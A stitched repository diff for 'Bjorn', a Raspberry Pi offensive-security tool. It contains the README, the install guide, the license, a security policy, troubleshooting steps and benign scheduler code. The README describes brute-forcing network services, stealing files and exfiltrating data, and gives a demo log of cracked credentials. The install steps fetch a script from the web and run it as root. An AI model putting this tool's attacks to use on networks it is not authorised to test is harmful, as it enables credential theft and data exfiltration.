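    entry = json.loads(entry_text)
    module = importlib.import_module(entry["b_module"])
    return getattr(module, entry["b_class"])

cls = resolve_action(entry_json)
print(cls.__name__)  # prints: JSONDecoder
```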
## 📟 E-Paper Display Support
Support is currently hard-coded for the 2.13-inch V2 & V4 e-Paper HATs.
The program automatically detects the screen model and adapts the Python calls in the code accordingly.
For other versions:
- I don't have a V1 or V3 unit to validate the detection algorithm, so I can only hope it works properly.
### 🍾 Ghosting Removed!
While getting Bjorn to work with the different screen versions, I struggled, experimented with several parameters, and found out that it is possible to remove screen ghosting entirely! Take a look at the code; this method should be very useful for other projects using e-Paper screens!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
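A minimal skeleton of such an action module might look like this. The `shared_data` usage and the status strings returned are illustrative; mirror an existing action in `actions/` for the exact conventions (logging, timeouts, netkb updates):

```python
# Skeleton for a hypothetical actions/my_custom_action.py.

class MyCustomAction:
    """Example action implementing the required interface."""

    def __init__(self, shared_data):
        # shared_data carries configuration, paths, and helpers.
        self.shared_data = shared_data

    def execute(self, ip, port, row, status_key):
        # `row` is the host's netkb entry; `status_key` names the
        # column this action should update with its result.
        try:
            # ... do the actual work against ip:port here ...
            return "success"
        except Exception:
            return "failed"

action = MyCustomAction(shared_data=None)
print(action.execute("192.168.1.100", 22, row={}, status_key="MyCustomAction"))
```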
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

@@ -1,468 +0,0 @@
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
Bjorn was not developed on the Raspberry Pi Zero W2 (64-bit), but several users have reported that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the e-Paper screens V2 and V4 have been tested and implemented.
I just hope the V1 and V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is to use the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies system-wide
sudo pip install -r requirements.txt --break-system-packages
# I have not (yet) managed to get a stable installation inside a virtual environment, so the dependencies are installed system-wide (hence --break-system-packages); this has caused no issues so far. You can still try a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
Press i to enter insert mode
Locate the line containing "epd_type":
Change the value according to your screen model:
- For 2.13 V1: "epd_type": "epd2in13",
- For 2.13 V2: "epd_type": "epd2in13_V2",
- For 2.13 V3: "epd_type": "epd2in13_V3",
- For 2.13 V4: "epd_type": "epd2in13_V4",
Press Esc to exit insert mode
Type :wq and press Enter to save and quit
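If you prefer to script this change instead of editing with vi, a small Python helper can rewrite the key. The demo below runs on a throwaway file so it is safe anywhere; on the device, point `config_path` at `/home/bjorn/Bjorn/config/shared_config.json`:

```python
import json
import tempfile

def set_epd_type(config_path, epd_type):
    """Rewrite the epd_type key of a shared_config.json file in place."""
    with open(config_path, "r", encoding="utf-8") as f:
        config = json.load(f)
    config["epd_type"] = epd_type
    with open(config_path, "w", encoding="utf-8") as f:
        json.dump(config, f, indent=4)

# Demo on a temporary file standing in for shared_config.json.
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as tmp:
    json.dump({"epd_type": "epd2in13"}, tmp)
    path = tmp.name

set_epd_type(path, "epd2in13_V4")
with open(path, encoding="utf-8") as f:
    print(json.load(f)["epd_type"])  # prints: epd2in13_V4
```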
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
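To confirm that fresh sessions actually pick up the new limit, you can query it from Python after logging back in; both values should report 65535 once everything above is in place:

```python
import resource

# RLIMIT_NOFILE is the per-process open-files limit that
# limits.conf + pam_limits.so control for login sessions.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print(f"soft={soft} hard={hard}")  # expect soft=65535 hard=65535 after the changes
```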
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart when the limit is approached (ulimit -n minus a buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot before the device can be used as a USB gadget (with its static IP).
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

LICENSE
@@ -1,21 +0,0 @@
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

README.md
@@ -1,179 +0,0 @@
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a "Tamagotchi-like", sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data exfiltration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
[![Architecture](https://img.shields.io/badge/ARCHITECTURE-Read_Docs-ff69b4?style=for-the-badge&logo=github)](./ARCHITECTURE.md)
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
Bjorn was not developed on the Raspberry Pi Zero W2 (64-bit), but several users have reported that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the e-Paper screens V2 and V4 have been tested and implemented.
I just hope the V1 and V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is to use the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about the **installation** process, go to the [Install Guide](INSTALL.md).
## ⚡ Quick Start
**Need help? Struggling to find Bjorn's IP after the installation?**
Use my Bjorn Detector & SSH Launcher:
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, you still need help?**
For **detailed information** about **troubleshooting**, go to [Troubleshooting](TROUBLESHOOTING.md).
**Quick Installation**: use the fastest way to install **Bjorn**: [Getting Started](#-getting-started).
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about the **contributing** process, go to the [Contributing Docs](CONTRIBUTING.md), [Code Of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

@@ -1,48 +0,0 @@
# 🔒 Security Policy
The Security Policy for the **Bjorn** repository includes the required compliance matrix and artifact mapping.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- The logs periodically report this figure as `(FD : XXX)`.
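The same figure can be obtained from Python via `/proc` on Linux, which is roughly what the `(FD : XXX)` log line reflects (a sketch, not Bjorn's exact implementation):

```python
import os

def open_fd_count(pid="self"):
    """Count the open file descriptors of a process via /proc (Linux only)."""
    return len(os.listdir(f"/proc/{pid}/fd"))

print(open_fd_count())  # current process; pass Bjorn.py's PID on a real device
```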
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
# Follow the bjorn service journal
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs
sudo journalctl -u bjorn.service -f
# or
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

# action_scheduler.py # action_scheduler.py testsdd
# Smart Action Scheduler for Bjorn - queue-only implementation # Smart Action Scheduler for Bjorn - queue-only implementation
# Handles trigger evaluation, requirements checking, and queue management. # Handles trigger evaluation, requirements checking, and queue management.
# #
@@ -24,6 +24,7 @@ from typing import Any, Dict, List, Optional, Tuple
from init_shared import shared_data from init_shared import shared_data
from logger import Logger from logger import Logger
from ai_engine import get_or_create_ai_engine
logger = Logger(name="action_scheduler.py") logger = Logger(name="action_scheduler.py")
@@ -73,6 +74,8 @@ class ActionScheduler:
# Runtime flags # Runtime flags
self.running = True self.running = True
self.check_interval = 5 # seconds between iterations self.check_interval = 5 # seconds between iterations
self._stop_event = threading.Event()
self._error_backoff = 1.0
# Action definition cache # Action definition cache
self._action_definitions: Dict[str, Dict[str, Any]] = {} self._action_definitions: Dict[str, Dict[str, Any]] = {}
@@ -85,6 +88,22 @@ class ActionScheduler:
self._last_source_is_studio: Optional[bool] = None self._last_source_is_studio: Optional[bool] = None
# Enforce DB invariants (idempotent) # Enforce DB invariants (idempotent)
self._ensure_db_invariants() self._ensure_db_invariants()
# Throttling for priorities
self._last_priority_update = 0.0
self._priority_update_interval = 60.0 # seconds
# Initialize AI engine for recommendations ONLY in AI mode.
# Uses singleton so model weights are loaded only once across the process.
self.ai_engine = None
if self.shared_data.operation_mode == "AI":
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine is None:
logger.info_throttled(
"AI engine unavailable in scheduler; continuing heuristic-only",
key="scheduler_ai_init_failed",
interval_s=300.0,
)
logger.info("ActionScheduler initialized") logger.info("ActionScheduler initialized")
@@ -95,8 +114,24 @@ class ActionScheduler:
logger.info("ActionScheduler starting main loop") logger.info("ActionScheduler starting main loop")
while self.running and not self.shared_data.orchestrator_should_exit: while self.running and not self.shared_data.orchestrator_should_exit:
try: try:
# If the user toggles AI mode at runtime, enable/disable AI engine without restart.
if self.shared_data.operation_mode == "AI" and self.ai_engine is None:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine:
logger.info("Scheduler: AI engine enabled (singleton)")
else:
logger.info_throttled(
"Scheduler: AI engine unavailable; staying heuristic-only",
key="scheduler_ai_enable_failed",
interval_s=300.0,
)
elif self.shared_data.operation_mode != "AI" and self.ai_engine is not None:
self.ai_engine = None
# Refresh action cache if needed # Refresh action cache if needed
self._refresh_cache_if_needed() self._refresh_cache_if_needed()
# Keep queue consistent with current enable/disable flags.
self._cancel_queued_disabled_actions()
# 1) Promote scheduled actions that are due # 1) Promote scheduled actions that are due
self._promote_scheduled_to_pending() self._promote_scheduled_to_pending()
@@ -114,21 +149,260 @@ class ActionScheduler:
self.cleanup_queue() self.cleanup_queue()
self.update_priorities() self.update_priorities()
time.sleep(self.check_interval) self._error_backoff = 1.0
if self._stop_event.wait(self.check_interval):
break
except Exception as e: except Exception as e:
logger.error(f"Error in scheduler loop: {e}") logger.error(f"Error in scheduler loop: {e}")
time.sleep(self.check_interval) if self._stop_event.wait(self._error_backoff):
break
self._error_backoff = min(self._error_backoff * 2.0, 15.0)
logger.info("ActionScheduler stopped")
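The loop's error handling above follows a common interruptible-backoff pattern: sleep on a `threading.Event` so `stop()` can wake the thread immediately, double the delay after each failure, and reset it after a clean pass. A compressed, self-contained sketch of that pattern (tiny delays and a simulated fault sequence, purely illustrative):

```python
import threading

stop = threading.Event()
backoff = 0.01                      # scaled down from 1.0s for the demo
faults = iter([True, True, False])  # two transient failures, then success

log = []
while not stop.is_set():
    try:
        if next(faults, False):
            raise RuntimeError("transient failure")
        log.append(("ok", backoff))
        backoff = 0.01              # reset after a clean iteration
        break
    except RuntimeError:
        log.append(("err", backoff))
        if stop.wait(backoff):      # interruptible sleep; True means stop() fired
            break
        backoff = min(backoff * 2.0, 0.15)

print(log)  # [('err', 0.01), ('err', 0.02), ('ok', 0.04)]
```

Using `Event.wait()` instead of `time.sleep()` is what lets `stop()` interrupt a long backoff without waiting it out.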
# ----------------------------------------------------------------- priorities
def update_priorities(self):
"""
Update priorities of pending actions.
1. Increase priority over time (starvation prevention) with MIN(100) cap.
2. [AI Mode] Boost priority of actions recommended by AI engine.
"""
now = time.time()
if now - self._last_priority_update < self._priority_update_interval:
return
try:
# 1. Anti-starvation aging: +1 per minute for actions waiting >1 hour.
# julianday is portable across all SQLite builds.
# MIN(100) cap prevents unbounded priority inflation.
affected = self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
self._last_priority_update = now
if affected and affected > 0:
logger.debug(f"Aged {affected} pending actions in queue")
# 2. AI Recommendation Boost
if self.shared_data.operation_mode == "AI" and self.ai_engine:
self._apply_ai_priority_boost()
elif self.shared_data.operation_mode == "AI" and not self.ai_engine:
logger.warning("Operation mode is AI, but ai_engine is not initialized!")
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
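The aging UPDATE above can be exercised in isolation. A minimal sketch against an in-memory SQLite database, using a reduced stand-in for the `action_queue` schema:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE action_queue (
        id INTEGER PRIMARY KEY,
        status TEXT,
        priority INTEGER,
        created_at TEXT
    )
""")
# One stale pending row (2 hours old) and one fresh row.
conn.execute("INSERT INTO action_queue (status, priority, created_at) "
             "VALUES ('pending', 99, datetime('now', '-2 hours'))")
conn.execute("INSERT INTO action_queue (status, priority, created_at) "
             "VALUES ('pending', 50, datetime('now'))")

# Same aging rule: +1 after >1 hour (0.0417 days), capped at 100.
conn.execute("""
    UPDATE action_queue
    SET priority = MIN(100, priority + 1)
    WHERE status='pending'
      AND julianday('now') - julianday(created_at) > 0.0417
""")
print([r[0] for r in conn.execute(
    "SELECT priority FROM action_queue ORDER BY id")])  # [100, 50]
```

Only the stale row is touched; the two-argument `MIN()` scalar function keeps the boosted value at the 100 cap.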
def _apply_ai_priority_boost(self):
"""Boost priority of actions recommended by AI engine."""
try:
if not self.ai_engine:
logger.warning("AI Boost skipped: ai_engine is None")
return
# Get list of unique hosts with pending actions
hosts = self.db.query("""
SELECT DISTINCT mac_address FROM action_queue
WHERE status='pending'
""")
if not hosts:
return
for row in hosts:
mac = row['mac_address']
if not mac:
continue
# Get available actions for this host
available = [
r['action_name'] for r in self.db.query("""
SELECT DISTINCT action_name FROM action_queue
WHERE mac_address=? AND status='pending'
""", (mac,))
]
if not available:
continue
# Get host context
host_data = self.db.get_host_by_mac(mac)
if not host_data:
continue
context = {
'mac': mac,
'hostname': (host_data.get('hostnames') or '').split(';')[0],
'ports': [
int(p) for p in (host_data.get('ports') or '').split(';')
if p.isdigit()
]
}
# Ask AI for recommendation
recommended_action, confidence, debug = self.ai_engine.choose_action(
host_context=context,
